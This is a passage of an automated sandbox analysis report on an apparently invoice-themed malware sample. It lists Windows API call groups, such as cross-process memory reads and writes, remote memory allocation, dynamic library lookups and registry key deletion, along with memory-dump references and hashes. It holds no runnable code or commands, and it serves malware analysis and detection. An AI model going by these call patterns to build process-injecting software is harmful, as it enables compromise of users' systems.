                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorHandling__87except__start
                                                                            • String ID: pow
                                                                            • API String ID: 2905807303-2276729525
                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: 3c$_
                                                                            • API String ID: 4104443479-4099079164
                                                                            APIs
                                                                              • Part of subcall function 00F314BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F29296,?,?,00000034,00000800,?,00000034), ref: 00F314E6
                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F2983F
                                                                              • Part of subcall function 00F31487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F292C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00F314B1
                                                                              • Part of subcall function 00F313DE: GetWindowThreadProcessId.USER32(?,?), ref: 00F31409
                                                                              • Part of subcall function 00F313DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F2925A,00000034,?,?,00001004,00000000,00000000), ref: 00F31419
                                                                              • Part of subcall function 00F313DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F2925A,00000034,?,?,00001004,00000000,00000000), ref: 00F3142F
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F298AC
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F298F9
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                            • String ID: @
                                                                            • API String ID: 4150878124-2766056989
                                                                            APIs
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F5F910,00000000,?,?,?,?), ref: 00F579DF
                                                                            • GetWindowLongW.USER32 ref: 00F579FC
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F57A0C
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Window$Long
                                                                            • String ID: SysTreeView32
                                                                            • API String ID: 847901565-1698111956
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F57461
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F57475
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F57499
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: MessageSend$Window
                                                                            • String ID: SysMonthCal32
                                                                            • API String ID: 2326795674-1439706946
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F57C4A
                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F57C58
                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F57C5F
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: MessageSend$DestroyWindow
                                                                            • String ID: msctls_updown32
                                                                            • API String ID: 4014797782-2298589950
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F56D3B
                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F56D4B
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F56D70
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: MessageSend$MoveWindow
                                                                            • String ID: Listbox
                                                                            • API String ID: 3315199576-2633736733
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F57772
                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F57787
                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F57794
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: msctls_trackbar32
                                                                            • API String ID: 3850602802-1010561917
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00ED4AD0), ref: 00ED4B45
                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00ED4B57
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                                            • API String ID: 2574300362-192647395
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00ED4B83,?), ref: 00ED4C44
                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00ED4C56
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                            • API String ID: 2574300362-1355242751
                                                                            • Opcode ID: 9770454cb2364071675478accf95779d7ef423153edc57bbb1262dc387b5587c
                                                                            • Instruction ID: c9401b1128928d555ccec6b2ff807f2f1ec9c716a9d836eff1902c29a751dd41
                                                                            • Opcode Fuzzy Hash: 9770454cb2364071675478accf95779d7ef423153edc57bbb1262dc387b5587c
                                                                            • Instruction Fuzzy Hash: 2BD0C270510B13CFD7205F31C908606B3D4AF0134AB10887A9591D66A0E670C484D651
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00ED4BD0,?,00ED4DEF,?,00F952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00ED4C11
                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00ED4C23
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                            • API String ID: 2574300362-3689287502
                                                                            • Opcode ID: 54afe9bb849d67afd1dc57a12b2f5bab53dfca24ae77815d84443d1b50ade09b
                                                                            • Instruction ID: 086d39ad745dfda567acfd2bc8be1e9d7f40eb72442bcad50c4dad8be3a44dec
                                                                            • Opcode Fuzzy Hash: 54afe9bb849d67afd1dc57a12b2f5bab53dfca24ae77815d84443d1b50ade09b
                                                                            • Instruction Fuzzy Hash: F7D0C270510B13CFD7206F70CA48606B6D5EF0934AB008C7A9481D6290E7B0C485DB51
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,00F51039), ref: 00F50DF5
                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F50E07
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                            • API String ID: 2574300362-4033151799
                                                                            • Opcode ID: 9a4d5839318afc0c3190b30e93bd51a41053de0edfd22565b7f86bae47b9f55f
                                                                            • Instruction ID: c6657912f895d1f8bc7c360074788088d373dcf2ce604c00b2a643df6ca21912
                                                                            • Opcode Fuzzy Hash: 9a4d5839318afc0c3190b30e93bd51a41053de0edfd22565b7f86bae47b9f55f
                                                                            • Instruction Fuzzy Hash: BDD0C730800B26CFC321AF70C80A28272E4AF00363F288C3E9A82C6150EBB0D894EB40
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00F48CF4,?,00F5F910), ref: 00F490EE
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F49100
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                            • API String ID: 2574300362-199464113
                                                                            • Opcode ID: 13d05a7398fef1fa3a1b6d165ed239fdd1adb95f0afe6b03cd833161c896c56e
                                                                            • Instruction ID: 638cc09cb21c84da2cb65e95cba8893914ac739dbb4acda27073d671667e9467
                                                                            • Opcode Fuzzy Hash: 13d05a7398fef1fa3a1b6d165ed239fdd1adb95f0afe6b03cd833161c896c56e
                                                                            • Instruction Fuzzy Hash: BED01234A14713DFD7209F31D81854776D4AF45356B11887A9A86D6550E6B0C484E791
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: LocalTime__swprintf
                                                                            • String ID: %.3d$WIN_XPe
                                                                            • API String ID: 2070861257-2409531811
                                                                            • Opcode ID: 6ef304e81ef7c90450027b87f6f35c7a84a001c6c0832daa5a03dcc449e64d3c
                                                                            • Instruction ID: ac63de0a80bdd7f761d3cbbde7190d45a2026c464d47ffb2fad2548f7a12bfd4
                                                                            • Opcode Fuzzy Hash: 6ef304e81ef7c90450027b87f6f35c7a84a001c6c0832daa5a03dcc449e64d3c
                                                                            • Instruction Fuzzy Hash: F1D0127280910DEACB009A90988C9F9777CB718301F141452FB02E2280E221C7D9F621
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ab0d728a7cd06ea076bd1de4820d79fc2a1e704d8d22dc2302378cb48afd58a9
                                                                            • Instruction ID: 05d508fa2e5763d17fb730efaed75229ea46da4a584a0a2911fd073e21aeb829
                                                                            • Opcode Fuzzy Hash: ab0d728a7cd06ea076bd1de4820d79fc2a1e704d8d22dc2302378cb48afd58a9
                                                                            • Instruction Fuzzy Hash: 10C18075A04326EFCB14EF94D884EAEBBB5FF48314B148598E805EB251D730ED81EB90
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?), ref: 00F4E0BE
                                                                            • CharLowerBuffW.USER32(?,?), ref: 00F4E101
                                                                              • Part of subcall function 00F4D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F4D7C5
                                                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00F4E301
                                                                            • _memmove.LIBCMT ref: 00F4E314
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharLower$AllocVirtual_memmove
                                                                            • String ID:
                                                                            • API String ID: 3659485706-0
                                                                            • Opcode ID: db96df360e4d7e79e8eb8c715330027ed2414acd206677ad963ef4d751554b14
                                                                            • Instruction ID: 1fa97134e6011d610212ad421fa68a31cfdb64fba410ebd7619f415b11c8ec4c
                                                                            • Opcode Fuzzy Hash: db96df360e4d7e79e8eb8c715330027ed2414acd206677ad963ef4d751554b14
                                                                            • Instruction Fuzzy Hash: 62C15B71A043019FC714DF28C480A6ABBE4FF89724F14896EF9999B352D771E946CB81
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 00F480C3
                                                                            • CoUninitialize.COMBASE ref: 00F480CE
                                                                              • Part of subcall function 00F2D56C: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00F2D5D4
                                                                            • VariantInit.OLEAUT32(?), ref: 00F480D9
                                                                            • VariantClear.OLEAUT32(?), ref: 00F483AA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                            • String ID:
                                                                            • API String ID: 780911581-0
                                                                            • Opcode ID: 3d3364f82bc27b1aa5a55fbe8e72585ad81e887972c87311d9090532686e65ae
                                                                            • Instruction ID: 2e69e5c77cb1c44881f962701125ce813212d218045cea44aadb23f7d88a3954
                                                                            • Opcode Fuzzy Hash: 3d3364f82bc27b1aa5a55fbe8e72585ad81e887972c87311d9090532686e65ae
                                                                            • Instruction Fuzzy Hash: 02A136756047019FDB04DF14C881A2EBBE4FF89764F144449F996AB3A2CB74ED06EB82
                                                                            APIs
                                                                            • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00F276EA
                                                                            • CoTaskMemFree.COMBASE(00000000), ref: 00F27702
                                                                            • CLSIDFromProgID.COMBASE(?,?), ref: 00F27727
                                                                            • _memcmp.LIBCMT ref: 00F27748
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: FromProg$FreeTask_memcmp
                                                                            • String ID:
                                                                            • API String ID: 314563124-0
                                                                            • Opcode ID: fd12d9c3a9a6ca79f31112fc8c1895d6c564ddcbc48efec0fdcfa39ea97e4c8f
                                                                            • Instruction ID: a617d2a7aecc20236d4863ffdf7617926955a7ecfff20635f011a6287a5bbc32
                                                                            • Opcode Fuzzy Hash: fd12d9c3a9a6ca79f31112fc8c1895d6c564ddcbc48efec0fdcfa39ea97e4c8f
                                                                            • Instruction Fuzzy Hash: C4813D71A00219EFCB04DFA4C984EEEB7B9FF89315F204198F505AB250DB71AE06DB60
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$AllocClearCopyInitString
                                                                            • String ID:
                                                                            • API String ID: 2808897238-0
                                                                            • Opcode ID: 38150fd6e475be72aca6e5f4345b5ce3e9ebd3ff0f77f8053d3616930a310bac
                                                                            • Instruction ID: b5b888c14339d2f22aa7fe9e9872e22124e1074507bd84854007785da373d4d5
                                                                            • Opcode Fuzzy Hash: 38150fd6e475be72aca6e5f4345b5ce3e9ebd3ff0f77f8053d3616930a310bac
                                                                            • Instruction Fuzzy Hash: 4751C675B003159ACB24EF65E8A173AB3E5EF45310F20D81FE586EB291DB38DC81AB01
                                                                            APIs
                                                                            • GetWindowRect.USER32(0114EC20,?), ref: 00F59863
                                                                            • ScreenToClient.USER32(00000002,00000002), ref: 00F59896
                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00F59903
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientMoveRectScreen
                                                                            • String ID:
                                                                            • API String ID: 3880355969-0
                                                                            • Opcode ID: 1f2131f64f1bb7eb985f1d6ba551d793c80bded67f42bece7cb9762a1e9ff215
                                                                            • Instruction ID: 4199bef3dc17712b1a5cc3c30164a66e968e656575c348fd4954690a2f57e32b
                                                                            • Opcode Fuzzy Hash: 1f2131f64f1bb7eb985f1d6ba551d793c80bded67f42bece7cb9762a1e9ff215
                                                                            • Instruction Fuzzy Hash: 9A514D34A04208EFCF14CF64C884AAE7BB5FF45362F548159FA659B2A0D770AD85EB90
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00F29AD2
                                                                            • __itow.LIBCMT ref: 00F29B03
                                                                              • Part of subcall function 00F29D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00F29DBE
                                                                            • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00F29B6C
                                                                            • __itow.LIBCMT ref: 00F29BC3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$__itow
                                                                            • String ID:
                                                                            • API String ID: 3379773720-0
                                                                            • Opcode ID: 29c0e954bd278998edbd9350e26b93127a7d8de4b2c1d0ecf4a46db0095971be
                                                                            • Instruction ID: 84e37fcd07c17cd3c7d4ff0b63271c3f35892a812e85c7f8a3c50b6f584e8992
                                                                            • Opcode Fuzzy Hash: 29c0e954bd278998edbd9350e26b93127a7d8de4b2c1d0ecf4a46db0095971be
                                                                            • Instruction Fuzzy Hash: 5641B171A04318ABDF11EF54E845BFE7BF9EF88720F00006AF945A3291DBB09A45DB61
                                                                            APIs
                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F3B89E
                                                                            • GetLastError.KERNEL32(?,00000000), ref: 00F3B8C4
                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F3B8E9
                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F3B915
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 3321077145-0
                                                                            • Opcode ID: 0dfddd26ba2080d9382dd1fb977d34ae5413f6ebd7b1870d5c50b58b5d16cb39
                                                                            • Instruction ID: bb9c1804dfe70b59a98c45551a07b23872c47dab6ea93cf984aad01b6f56fbce
                                                                            • Opcode Fuzzy Hash: 0dfddd26ba2080d9382dd1fb977d34ae5413f6ebd7b1870d5c50b58b5d16cb39
                                                                            • Instruction Fuzzy Hash: FC412D39A00654DFCB14EF15C855A5DBBE1EF49720F058099ED4AAB362CB34FD02EB91
                                                                            APIs
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F588DE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: InvalidateRect
                                                                            • String ID:
                                                                            • API String ID: 634782764-0
                                                                            • Opcode ID: df2f4602445ef405dbf79786d414d4a9a4be5db1c385479ab130a9d95014323f
